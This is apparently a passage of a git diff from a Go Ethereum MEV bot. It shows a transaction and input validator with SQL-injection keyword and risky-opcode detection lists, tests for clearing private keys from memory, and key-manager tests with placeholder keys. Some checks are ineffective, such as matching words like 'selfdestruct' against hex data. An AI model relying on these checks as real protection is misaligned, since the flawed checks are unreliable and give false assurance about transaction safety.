Slippage uint64 `json:"slippage_bps"`
Deadline time.Time `json:"deadline"`
Recipient common.Address `json:"recipient"`
Pool common.Address `json:"pool"`
}
// ArbitrageParams represents arbitrage parameters for validation
type ArbitrageParams struct {
BuyPool common.Address `json:"buy_pool"`
SellPool common.Address `json:"sell_pool"`
Token common.Address `json:"token"`
AmountIn *big.Int `json:"amount_in"`
MinProfit *big.Int `json:"min_profit"`
MaxGasPrice *big.Int `json:"max_gas_price"`
Deadline time.Time `json:"deadline"`
}
// NewInputValidator creates a new input validator with security limits
func NewInputValidator(chainID uint64) *InputValidator {
return &InputValidator{
safeMath: NewSafeMath(),
maxGasLimit: 15000000, // 15M gas limit
maxGasPrice: new(big.Int).Mul(big.NewInt(10000), big.NewInt(1e9)), // 10000 Gwei
chainID: chainID,
}
}
// ValidateAddress validates an Ethereum address
func (iv *InputValidator) ValidateAddress(addr common.Address) *ValidationResult {
result := &ValidationResult{Valid: true}
// Check for zero address
if addr == (common.Address{}) {
result.Valid = false
result.Errors = append(result.Errors, "address cannot be zero address")
return result
}
// Check for known malicious addresses (extend this list as needed)
maliciousAddresses := []common.Address{
// Add known malicious addresses here
common.HexToAddress("0x0000000000000000000000000000000000000000"),
}
for _, malicious := range maliciousAddresses {
if addr == malicious {
result.Valid = false
result.Errors = append(result.Errors, "address is flagged as malicious")
return result
}
}
// Check for suspicious patterns
addrStr := addr.Hex()
if strings.Contains(strings.ToLower(addrStr), "dead") ||
strings.Contains(strings.ToLower(addrStr), "beef") {
result.Warnings = append(result.Warnings, "address contains suspicious patterns")
}
return result
}
// ValidateTransaction validates a complete transaction
func (iv *InputValidator) ValidateTransaction(tx *types.Transaction) *ValidationResult {
result := &ValidationResult{Valid: true}
// Validate chain ID
if tx.ChainId().Uint64() != iv.chainID {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("invalid chain ID: expected %d, got %d", iv.chainID, tx.ChainId().Uint64()))
}
// Validate gas limit
if tx.Gas() > iv.maxGasLimit {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("gas limit %d exceeds maximum %d", tx.Gas(), iv.maxGasLimit))
}
if tx.Gas() < 21000 {
result.Valid = false
result.Errors = append(result.Errors, "gas limit below minimum 21000")
}
// Validate gas price
if tx.GasPrice() != nil {
if err := iv.safeMath.ValidateGasPrice(tx.GasPrice()); err != nil {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("invalid gas price: %v", err))
}
}
// Validate transaction value
if tx.Value() != nil {
if err := iv.safeMath.ValidateTransactionValue(tx.Value()); err != nil {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("invalid transaction value: %v", err))
}
}
// Validate recipient address
if tx.To() != nil {
addrResult := iv.ValidateAddress(*tx.To())
if !addrResult.Valid {
result.Valid = false
result.Errors = append(result.Errors, "invalid recipient address")
result.Errors = append(result.Errors, addrResult.Errors...)
}
result.Warnings = append(result.Warnings, addrResult.Warnings...)
}
// Validate transaction data for suspicious patterns
if len(tx.Data()) > 0 {
dataResult := iv.validateTransactionData(tx.Data())
if !dataResult.Valid {
result.Valid = false
result.Errors = append(result.Errors, dataResult.Errors...)
}
result.Warnings = append(result.Warnings, dataResult.Warnings...)
}
return result
}
// ValidateSwapParams validates swap parameters
func (iv *InputValidator) ValidateSwapParams(params *SwapParams) *ValidationResult {
result := &ValidationResult{Valid: true}
// Validate addresses
for _, addr := range []common.Address{params.TokenIn, params.TokenOut, params.Recipient, params.Pool} {
addrResult := iv.ValidateAddress(addr)
if !addrResult.Valid {
result.Valid = false
result.Errors = append(result.Errors, addrResult.Errors...)
}
result.Warnings = append(result.Warnings, addrResult.Warnings...)
}
// Validate tokens are different
if params.TokenIn == params.TokenOut {
result.Valid = false
result.Errors = append(result.Errors, "token in and token out cannot be the same")
}
// Validate amounts
if params.AmountIn == nil || params.AmountIn.Sign() <= 0 {
result.Valid = false
result.Errors = append(result.Errors, "amount in must be positive")
}
if params.AmountOut == nil || params.AmountOut.Sign() <= 0 {
result.Valid = false
result.Errors = append(result.Errors, "amount out must be positive")
}
// Validate slippage
if params.Slippage > 10000 { // Max 100%
result.Valid = false
result.Errors = append(result.Errors, "slippage cannot exceed 100%")
}
if params.Slippage > 500 { // Warn if > 5%
result.Warnings = append(result.Warnings, "slippage above 5% detected")
}
// Validate deadline
if params.Deadline.Before(time.Now()) {
result.Valid = false
result.Errors = append(result.Errors, "deadline is in the past")
}
if params.Deadline.After(time.Now().Add(1 * time.Hour)) {
result.Warnings = append(result.Warnings, "deadline is more than 1 hour in the future")
}
return result
}
// ValidateArbitrageParams validates arbitrage parameters
func (iv *InputValidator) ValidateArbitrageParams(params *ArbitrageParams) *ValidationResult {
result := &ValidationResult{Valid: true}
// Validate addresses
for _, addr := range []common.Address{params.BuyPool, params.SellPool, params.Token} {
addrResult := iv.ValidateAddress(addr)
if !addrResult.Valid {
result.Valid = false
result.Errors = append(result.Errors, addrResult.Errors...)
}
result.Warnings = append(result.Warnings, addrResult.Warnings...)
}
// Validate pools are different
if params.BuyPool == params.SellPool {
result.Valid = false
result.Errors = append(result.Errors, "buy pool and sell pool cannot be the same")
}
// Validate amounts
if params.AmountIn == nil || params.AmountIn.Sign() <= 0 {
result.Valid = false
result.Errors = append(result.Errors, "amount in must be positive")
}
if params.MinProfit == nil || params.MinProfit.Sign() <= 0 {
result.Valid = false
result.Errors = append(result.Errors, "minimum profit must be positive")
}
// Validate gas price
if params.MaxGasPrice != nil {
if err := iv.safeMath.ValidateGasPrice(params.MaxGasPrice); err != nil {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("invalid max gas price: %v", err))
}
}
// Validate deadline
if params.Deadline.Before(time.Now()) {
result.Valid = false
result.Errors = append(result.Errors, "deadline is in the past")
}
// Check if arbitrage is potentially profitable
if params.AmountIn != nil && params.MinProfit != nil {
// Rough profitability check (at least 0.1% profit)
minProfitThreshold, _ := iv.safeMath.SafePercent(params.AmountIn, 10) // 0.1%
if params.MinProfit.Cmp(minProfitThreshold) < 0 {
result.Warnings = append(result.Warnings, "minimum profit threshold is very low")
}
}
return result
}
// validateTransactionData validates transaction data for suspicious patterns
func (iv *InputValidator) validateTransactionData(data []byte) *ValidationResult {
result := &ValidationResult{Valid: true}
// Check data size
if len(data) > 100000 { // 100KB limit
result.Valid = false
result.Errors = append(result.Errors, "transaction data exceeds size limit")
return result
}
// Convert to hex string for pattern matching
dataHex := common.Bytes2Hex(data)
// Check for suspicious patterns
suspiciousPatterns := []struct {
pattern string
message string
critical bool
}{
{"selfdestruct", "contains selfdestruct operation", true},
{"delegatecall", "contains delegatecall operation", false},
{"create2", "contains create2 operation", false},
{"ff" + strings.Repeat("00", 19), "contains potential burn address", false},
}
for _, suspicious := range suspiciousPatterns {
if strings.Contains(strings.ToLower(dataHex), strings.ToLower(suspicious.pattern)) {
if suspicious.critical {
result.Valid = false
result.Errors = append(result.Errors, "transaction "+suspicious.message)
} else {
result.Warnings = append(result.Warnings, "transaction "+suspicious.message)
}
}
}
// Check for known function selectors of risky operations
if len(data) >= 4 {
selector := common.Bytes2Hex(data[:4])
riskySelectors := map[string]string{
"ff6cae96": "selfdestruct function",
"9dc29fac": "burn function",
"42966c68": "burn function (alternative)",
}
if message, exists := riskySelectors[selector]; exists {
result.Warnings = append(result.Warnings, "transaction calls "+message)
}
}
return result
}
// ValidateString validates string inputs for injection attacks
func (iv *InputValidator) ValidateString(input, fieldName string, maxLength int) *ValidationResult {
result := &ValidationResult{Valid: true}
// Check length
if len(input) > maxLength {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("%s exceeds maximum length %d", fieldName, maxLength))
}
// Check for null bytes
if strings.Contains(input, "\x00") {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("%s contains null bytes", fieldName))
}
// Check for control characters
controlCharPattern := regexp.MustCompile(`[\x00-\x1f\x7f-\x9f]`)
if controlCharPattern.MatchString(input) {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("%s contains control characters", fieldName))
}
// Check for SQL injection patterns
sqlPatterns := []string{
"'", "\"", "--", "/*", "*/", "xp_", "sp_", "exec", "execute",
"select", "insert", "update", "delete", "drop", "create", "alter",
"union", "join", "script", "javascript",
}
lowerInput := strings.ToLower(input)
for _, pattern := range sqlPatterns {
if strings.Contains(lowerInput, pattern) {
result.Warnings = append(result.Warnings, fmt.Sprintf("%s contains potentially dangerous pattern: %s", fieldName, pattern))
}
}
return result
}
// ValidateNumericString validates numeric string inputs
func (iv *InputValidator) ValidateNumericString(input, fieldName string) *ValidationResult {
result := &ValidationResult{Valid: true}
// Check if string is numeric
numericPattern := regexp.MustCompile(`^[0-9]+(\.[0-9]+)?$`)
if !numericPattern.MatchString(input) {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("%s must be numeric", fieldName))
return result
}
// Check for leading zeros (except for decimals)
if len(input) > 1 && input[0] == '0' && input[1] != '.' {
result.Warnings = append(result.Warnings, fmt.Sprintf("%s has leading zeros", fieldName))
}
// Check for reasonable decimal places
if strings.Contains(input, ".") {
parts := strings.Split(input, ".")
if len(parts[1]) > 18 {
result.Warnings = append(result.Warnings, fmt.Sprintf("%s has excessive decimal places", fieldName))
}
}
return result
}
// ValidateBatchSize validates batch operation sizes
func (iv *InputValidator) ValidateBatchSize(size int, operation string) *ValidationResult {
result := &ValidationResult{Valid: true}
maxBatchSizes := map[string]int{
"transaction": 100,
"swap": 50,
"arbitrage": 20,
"query": 1000,
}
maxSize, exists := maxBatchSizes[operation]
if !exists {
maxSize = 50 // Default
}
if size <= 0 {
result.Valid = false
result.Errors = append(result.Errors, "batch size must be positive")
}
if size > maxSize {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("batch size %d exceeds maximum %d for %s operations", size, maxSize, operation))
}
if size > maxSize/2 {
result.Warnings = append(result.Warnings, fmt.Sprintf("large batch size %d for %s operations", size, operation))
}
return result
}
// SanitizeInput sanitizes string input by removing dangerous characters
func (iv *InputValidator) SanitizeInput(input string) string {
// Remove null bytes
input = strings.ReplaceAll(input, "\x00", "")
// Remove control characters except newline and tab
controlCharPattern := regexp.MustCompile(`[\x00-\x08\x0b\x0c\x0e-\x1f\x7f-\x9f]`)
input = controlCharPattern.ReplaceAllString(input, "")
// Trim whitespace
input = strings.TrimSpace(input)
return input
}
// ValidateExternalData performs comprehensive validation for data from external sources
func (iv *InputValidator) ValidateExternalData(data []byte, source string, maxSize int) *ValidationResult {
result := &ValidationResult{Valid: true}
// Comprehensive bounds checking
if data == nil {
result.Valid = false
result.Errors = append(result.Errors, "external data cannot be nil")
return result
}
// Check size limits
if len(data) > maxSize {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("external data size %d exceeds maximum %d for source %s", len(data), maxSize, source))
return result
}
// Check for obviously malformed data patterns
if len(data) > 0 {
// Check for all-zero data (suspicious)
allZero := true
for _, b := range data {
if b != 0 {
allZero = false
break
}
}
if allZero && len(data) > 32 {
result.Warnings = append(result.Warnings, "external data appears to be all zeros")
}
// Check for repetitive patterns that might indicate malformed data
if len(data) >= 4 {
pattern := data[:4]
repetitive := true
for i := 4; i < len(data) && i < 1000; i += 4 { // Check first 1KB for performance
if i+4 <= len(data) {
for j := 0; j < 4; j++ {
if data[i+j] != pattern[j] {
repetitive = false
break
}
}
if !repetitive {
break
}
}
}
if repetitive && len(data) > 64 {
result.Warnings = append(result.Warnings, "external data contains highly repetitive patterns")
}
}
}
return result
}
// ValidateArrayBounds validates array access bounds to prevent buffer overflows
func (iv *InputValidator) ValidateArrayBounds(arrayLen, index int, operation string) *ValidationResult {
result := &ValidationResult{Valid: true}
if arrayLen < 0 {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("negative array length %d in operation %s", arrayLen, operation))
return result
}
if index < 0 {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("negative array index %d in operation %s", index, operation))
return result
}
if index >= arrayLen {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("array index %d exceeds length %d in operation %s", index, arrayLen, operation))
return result
}
// Maximum reasonable array size (prevent DoS)
const maxArraySize = 100000
if arrayLen > maxArraySize {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("array length %d exceeds maximum %d in operation %s", arrayLen, maxArraySize, operation))
return result
}
return result
}
// ValidateBufferAccess validates buffer access operations
func (iv *InputValidator) ValidateBufferAccess(bufferSize, offset, length int, operation string) *ValidationResult {
result := &ValidationResult{Valid: true}
if bufferSize < 0 {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("negative buffer size %d in operation %s", bufferSize, operation))
return result
}
if offset < 0 {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("negative buffer offset %d in operation %s", offset, operation))
return result
}
if length < 0 {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("negative buffer length %d in operation %s", length, operation))
return result
}
if offset+length > bufferSize {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("buffer access [%d:%d] exceeds buffer size %d in operation %s", offset, offset+length, bufferSize, operation))
return result
}
// Check for integer overflow in offset+length calculation
if offset > 0 && length > 0 {
// Use uint64 to detect overflow
sum := uint64(offset) + uint64(length)
if sum > uint64(^uint(0)>>1) { // Max int value
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("integer overflow in buffer access calculation: offset %d + length %d in operation %s", offset, length, operation))
return result
}
}
return result
}
// ValidateMemoryAllocation validates memory allocation requests
func (iv *InputValidator) ValidateMemoryAllocation(size int, purpose string) *ValidationResult {
result := &ValidationResult{Valid: true}
if size < 0 {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("negative memory allocation size %d for purpose %s", size, purpose))
return result
}
if size == 0 {
result.Warnings = append(result.Warnings, fmt.Sprintf("zero memory allocation for purpose %s", purpose))
return result
}
// Set reasonable limits based on purpose
limits := map[string]int{
"transaction_data": 1024 * 1024, // 1MB
"abi_decoding": 512 * 1024, // 512KB
"log_message": 64 * 1024, // 64KB
"swap_params": 4 * 1024, // 4KB
"address_list": 100 * 1024, // 100KB
"default": 256 * 1024, // 256KB
}
limit, exists := limits[purpose]
if !exists {
limit = limits["default"]
}
if size > limit {
result.Valid = false
result.Errors = append(result.Errors, fmt.Sprintf("memory allocation size %d exceeds limit %d for purpose %s", size, limit, purpose))
return result
}
// Warn for large allocations
if size > limit/2 {
result.Warnings = append(result.Warnings, fmt.Sprintf("large memory allocation %d for purpose %s", size, purpose))
}
return result
}

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,244 @@
package security
import (
"crypto/ecdsa"
"crypto/rand"
"math/big"
"testing"
"github.com/ethereum/go-ethereum/crypto"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func TestEnhancedClearPrivateKey(t *testing.T) {
// Generate test key
key, err := ecdsa.GenerateKey(crypto.S256(), rand.Reader)
require.NoError(t, err)
require.NotNil(t, key)
require.NotNil(t, key.D)
// Store original values for verification
originalD := new(big.Int).Set(key.D)
originalX := new(big.Int).Set(key.PublicKey.X)
originalY := new(big.Int).Set(key.PublicKey.Y)
// Verify key has valid data before clearing
assert.True(t, key.D.Sign() != 0)
assert.True(t, key.PublicKey.X.Sign() != 0)
assert.True(t, key.PublicKey.Y.Sign() != 0)
// Clear the key
clearPrivateKey(key)
// Verify that the key data is effectively cleared
assert.Nil(t, key.D, "D should be nil after clearing")
assert.Nil(t, key.PublicKey.X, "X should be nil after clearing")
assert.Nil(t, key.PublicKey.Y, "Y should be nil after clearing")
assert.Nil(t, key.PublicKey.Curve, "Curve should be nil after clearing")
// Verify original values were actually non-zero
assert.True(t, originalD.Sign() != 0, "Original D should have been non-zero")
assert.True(t, originalX.Sign() != 0, "Original X should have been non-zero")
assert.True(t, originalY.Sign() != 0, "Original Y should have been non-zero")
}
func TestClearPrivateKeyNil(t *testing.T) {
// Test that clearing a nil key doesn't panic
clearPrivateKey(nil)
// Should complete without error
}
func TestClearPrivateKeyPartiallyNil(t *testing.T) {
// Test key with some nil components
key := &ecdsa.PrivateKey{}
// Should not panic with nil components
clearPrivateKey(key)
// Test with only D set
key.D = big.NewInt(12345)
clearPrivateKey(key)
assert.Nil(t, key.D)
}
func TestSecureClearBigInt(t *testing.T) {
tests := []struct {
name string
value *big.Int
}{
{
name: "small positive value",
value: big.NewInt(12345),
},
{
name: "large positive value",
value: new(big.Int).SetBytes([]byte{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF}),
},
{
name: "negative value",
value: big.NewInt(-9876543210),
},
{
name: "zero value",
value: big.NewInt(0),
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Create a copy to verify original was non-zero if applicable
original := new(big.Int).Set(tt.value)
// Clear the value
secureClearBigInt(tt.value)
// Verify it's cleared to zero
assert.True(t, tt.value.Sign() == 0, "big.Int should be zero after clearing")
assert.Equal(t, 0, tt.value.Cmp(big.NewInt(0)), "big.Int should equal zero")
// Verify original wasn't zero (except for zero test case)
if tt.name != "zero value" {
assert.True(t, original.Sign() != 0, "Original value should have been non-zero")
}
})
}
}
func TestSecureClearBigIntNil(t *testing.T) {
// Test that clearing nil doesn't panic
secureClearBigInt(nil)
// Should complete without error
}
func TestSecureClearBytes(t *testing.T) {
tests := []struct {
name string
data []byte
}{
{
name: "small byte slice",
data: []byte{0x01, 0x02, 0x03, 0x04},
},
{
name: "large byte slice",
data: make([]byte, 1024),
},
{
name: "empty byte slice",
data: []byte{},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Fill with non-zero data for large slice
if len(tt.data) > 4 {
for i := range tt.data {
tt.data[i] = byte(i % 256)
}
}
// Store original to verify it had data
original := make([]byte, len(tt.data))
copy(original, tt.data)
// Clear the data
secureClearBytes(tt.data)
// Verify all bytes are zero
for i, b := range tt.data {
assert.Equal(t, byte(0), b, "Byte at index %d should be zero", i)
}
// For non-empty slices, verify original had some non-zero data
if len(original) > 0 && len(original) <= 4 {
hasNonZero := false
for _, b := range original {
if b != 0 {
hasNonZero = true
break
}
}
if len(original) > 0 && tt.name != "empty byte slice" {
assert.True(t, hasNonZero, "Original data should have had non-zero bytes")
}
}
})
}
}
func TestMemorySecurityIntegration(t *testing.T) {
// Test the complete workflow of key generation, usage, and clearing
// Generate multiple keys
keys := make([]*ecdsa.PrivateKey, 10)
for i := range keys {
key, err := ecdsa.GenerateKey(crypto.S256(), rand.Reader)
require.NoError(t, err)
keys[i] = key
}
// Verify all keys are valid
for i, key := range keys {
assert.NotNil(t, key.D, "Key %d D should not be nil", i)
assert.True(t, key.D.Sign() != 0, "Key %d D should not be zero", i)
}
// Clear all keys
for i, key := range keys {
clearPrivateKey(key)
// Verify clearing worked
assert.Nil(t, key.D, "Key %d D should be nil after clearing", i)
assert.Nil(t, key.PublicKey.X, "Key %d X should be nil after clearing", i)
assert.Nil(t, key.PublicKey.Y, "Key %d Y should be nil after clearing", i)
}
}
func TestConcurrentKeyClearingOperation(t *testing.T) {
// Test concurrent clearing operations
const numKeys = 50
const numWorkers = 10
keys := make([]*ecdsa.PrivateKey, numKeys)
// Generate keys
for i := range keys {
key, err := ecdsa.GenerateKey(crypto.S256(), rand.Reader)
require.NoError(t, err)
keys[i] = key
}
// Channel to coordinate workers
keysChan := make(chan *ecdsa.PrivateKey, numKeys)
// Send keys to channel
for _, key := range keys {
keysChan <- key
}
close(keysChan)
// Start workers to clear keys concurrently
done := make(chan bool, numWorkers)
for i := 0; i < numWorkers; i++ {
go func() {
defer func() { done <- true }()
for key := range keysChan {
clearPrivateKey(key)
}
}()
}
// Wait for all workers to complete
for i := 0; i < numWorkers; i++ {
<-done
}
// Verify all keys are cleared
for i, key := range keys {
assert.Nil(t, key.D, "Key %d D should be nil after concurrent clearing", i)
assert.Nil(t, key.PublicKey.X, "Key %d X should be nil after concurrent clearing", i)
assert.Nil(t, key.PublicKey.Y, "Key %d Y should be nil after concurrent clearing", i)
}
}

View File

@@ -0,0 +1,829 @@
package security
import (
"crypto/ecdsa"
"math/big"
"testing"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/crypto"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/fraktal/mev-beta/internal/logger"
)
// TestNewKeyManager tests the creation of a new KeyManager
func TestNewKeyManager(t *testing.T) {
// Test with valid configuration
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
assert.NotNil(t, km)
assert.NotNil(t, km.keystore)
assert.NotNil(t, km.keys)
assert.NotNil(t, km.encryptionKey)
assert.Equal(t, config, km.config)
// Test with nil configuration (should use defaults with test encryption key)
defaultConfig := &KeyManagerConfig{
KeystorePath: "/tmp/test_default_keystore",
EncryptionKey: "default_test_encryption_key_very_long_and_secure_32chars",
}
km2, err := newKeyManagerForTesting(defaultConfig, log)
require.NoError(t, err)
assert.NotNil(t, km2)
assert.NotNil(t, km2.config)
assert.NotEmpty(t, km2.config.KeystorePath)
}
// TestNewKeyManagerInvalidConfig tests error cases for KeyManager creation
func TestNewKeyManagerInvalidConfig(t *testing.T) {
log := logger.New("info", "text", "")
// Test with empty encryption key
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore",
EncryptionKey: "",
}
km, err := newKeyManagerForTesting(config, log)
assert.Error(t, err)
assert.Nil(t, km)
assert.Contains(t, err.Error(), "encryption key cannot be empty")
// Test with short encryption key
config = &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore",
EncryptionKey: "short",
}
km, err = newKeyManagerForTesting(config, log)
assert.Error(t, err)
assert.Nil(t, km)
assert.Contains(t, err.Error(), "encryption key must be at least 32 characters")
// Test with empty keystore path
config = &KeyManagerConfig{
KeystorePath: "",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
km, err = newKeyManagerForTesting(config, log)
assert.Error(t, err)
assert.Nil(t, km)
assert.Contains(t, err.Error(), "keystore path cannot be empty")
}
// TestGenerateKey tests key generation functionality
func TestGenerateKey(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_generate",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Test generating a trading key
permissions := KeyPermissions{
CanSign: true,
CanTransfer: true,
MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH
}
address, err := km.GenerateKey("trading", permissions)
require.NoError(t, err)
assert.NotEqual(t, common.Address{}, address)
// Verify the key exists
keyInfo, err := km.GetKeyInfo(address)
require.NoError(t, err)
assert.Equal(t, address, keyInfo.Address)
assert.Equal(t, "trading", keyInfo.KeyType)
assert.Equal(t, permissions, keyInfo.Permissions)
assert.WithinDuration(t, time.Now(), keyInfo.CreatedAt, time.Second)
assert.WithinDuration(t, time.Now(), keyInfo.GetLastUsed(), time.Second)
assert.Equal(t, int64(0), keyInfo.GetUsageCount())
// Test generating an emergency key (should have expiration)
emergencyAddress, err := km.GenerateKey("emergency", permissions)
require.NoError(t, err)
assert.NotEqual(t, common.Address{}, emergencyAddress)
emergencyKeyInfo, err := km.GetKeyInfo(emergencyAddress)
require.NoError(t, err)
assert.NotNil(t, emergencyKeyInfo.ExpiresAt)
assert.True(t, emergencyKeyInfo.ExpiresAt.After(time.Now()))
}
// TestImportKey tests key import functionality
func TestImportKey(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_import",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate a test private key
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
privateKeyHex := common.Bytes2Hex(crypto.FromECDSA(privateKey))
// Import the key
permissions := KeyPermissions{
CanSign: true,
CanTransfer: false,
MaxTransferWei: nil,
}
address, err := km.ImportKey(privateKeyHex, "test", permissions)
require.NoError(t, err)
assert.NotEqual(t, common.Address{}, address)
// Verify the imported key
keyInfo, err := km.GetKeyInfo(address)
require.NoError(t, err)
assert.Equal(t, address, keyInfo.Address)
assert.Equal(t, "test", keyInfo.KeyType)
assert.Equal(t, permissions, keyInfo.Permissions)
// Test importing invalid key
_, err = km.ImportKey("invalid_private_key", "test", permissions)
assert.Error(t, err)
assert.Contains(t, err.Error(), "invalid private key")
// Test importing duplicate key
_, err = km.ImportKey(privateKeyHex, "duplicate", permissions)
assert.Error(t, err)
assert.Contains(t, err.Error(), "key already exists")
}
// TestListKeys tests key listing functionality
func TestListKeys(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_list",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Initially should be empty
keys := km.ListKeys()
assert.Empty(t, keys)
// Generate a few keys
permissions := KeyPermissions{CanSign: true}
addr1, err := km.GenerateKey("test1", permissions)
require.NoError(t, err)
addr2, err := km.GenerateKey("test2", permissions)
require.NoError(t, err)
// Check that both keys are listed
keys = km.ListKeys()
assert.Len(t, keys, 2)
assert.Contains(t, keys, addr1)
assert.Contains(t, keys, addr2)
}
// TestGetKeyInfo tests key information retrieval
func TestGetKeyInfo(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_info",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate a key
permissions := KeyPermissions{CanSign: true, CanTransfer: true}
address, err := km.GenerateKey("test", permissions)
require.NoError(t, err)
// Get key info
keyInfo, err := km.GetKeyInfo(address)
require.NoError(t, err)
assert.Equal(t, address, keyInfo.Address)
assert.Equal(t, "test", keyInfo.KeyType)
assert.Equal(t, permissions, keyInfo.Permissions)
// EncryptedKey should be nil in the returned info for security
assert.Nil(t, keyInfo.EncryptedKey)
// Test getting non-existent key
nonExistentAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
_, err = km.GetKeyInfo(nonExistentAddr)
assert.Error(t, err)
assert.Contains(t, err.Error(), "key not found")
}
// TestEncryptDecryptPrivateKey tests the encryption/decryption functionality
func TestEncryptDecryptPrivateKey(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_encrypt",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate a test private key
privateKey, err := crypto.GenerateKey()
require.NoError(t, err)
// Test encryption
encryptedKey, err := km.encryptPrivateKey(privateKey)
require.NoError(t, err)
assert.NotNil(t, encryptedKey)
assert.NotEmpty(t, encryptedKey)
// Test decryption
decryptedKey, err := km.decryptPrivateKey(encryptedKey)
require.NoError(t, err)
assert.NotNil(t, decryptedKey)
// Verify the keys are the same
assert.Equal(t, crypto.PubkeyToAddress(privateKey.PublicKey), crypto.PubkeyToAddress(decryptedKey.PublicKey))
assert.Equal(t, crypto.FromECDSA(privateKey), crypto.FromECDSA(decryptedKey))
// Test decryption with invalid data
_, err = km.decryptPrivateKey([]byte("x")) // Very short data to trigger "encrypted key too short"
assert.Error(t, err)
assert.Contains(t, err.Error(), "encrypted key too short")
}
// TestRotateKey tests key rotation functionality
func TestRotateKey(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_rotate",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate an original key
permissions := KeyPermissions{CanSign: true, CanTransfer: true}
originalAddr, err := km.GenerateKey("test", permissions)
require.NoError(t, err)
// Rotate the key
newAddr, err := km.RotateKey(originalAddr)
require.NoError(t, err)
assert.NotEqual(t, originalAddr, newAddr)
// Check that the original key still exists but has restricted permissions
originalInfo, err := km.GetKeyInfo(originalAddr)
require.NoError(t, err)
assert.False(t, originalInfo.Permissions.CanSign)
assert.False(t, originalInfo.Permissions.CanTransfer)
// Check that the new key has the same permissions
newInfo, err := km.GetKeyInfo(newAddr)
require.NoError(t, err)
assert.Equal(t, permissions, newInfo.Permissions)
assert.True(t, newInfo.Permissions.CanSign)
assert.True(t, newInfo.Permissions.CanTransfer)
// Test rotating non-existent key
nonExistentAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
_, err = km.RotateKey(nonExistentAddr)
assert.Error(t, err)
assert.Contains(t, err.Error(), "key not found")
}
// TestSignTransaction tests transaction signing with various scenarios
func TestSignTransaction(t *testing.T) {
config := &KeyManagerConfig{
KeystorePath: "/tmp/test_keystore_sign",
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
}
log := logger.New("info", "text", "")
km, err := newKeyManagerForTesting(config, log)
require.NoError(t, err)
// Generate a key with signing permissions
permissions := KeyPermissions{
CanSign: true,
CanTransfer: true,
MaxTransferWei: big.NewInt(1000000000000000000), // 1 ETH (safe int64 value)
}
signerAddr, err := km.GenerateKey("signer", permissions)
require.NoError(t, err)
// Create a test transaction using Arbitrum chain ID (EIP-155 transaction)
chainID := big.NewInt(42161) // Arbitrum One
// Create transaction data for EIP-155 transaction
toAddr := common.HexToAddress("0x1234567890123456789012345678901234567890")
value := big.NewInt(1000000000000000000) // 1 ETH
gasLimit := uint64(21000)
gasPrice := big.NewInt(20000000000) // 20 Gwei
nonce := uint64(0)
// Create DynamicFeeTx (EIP-1559) which properly handles chain ID
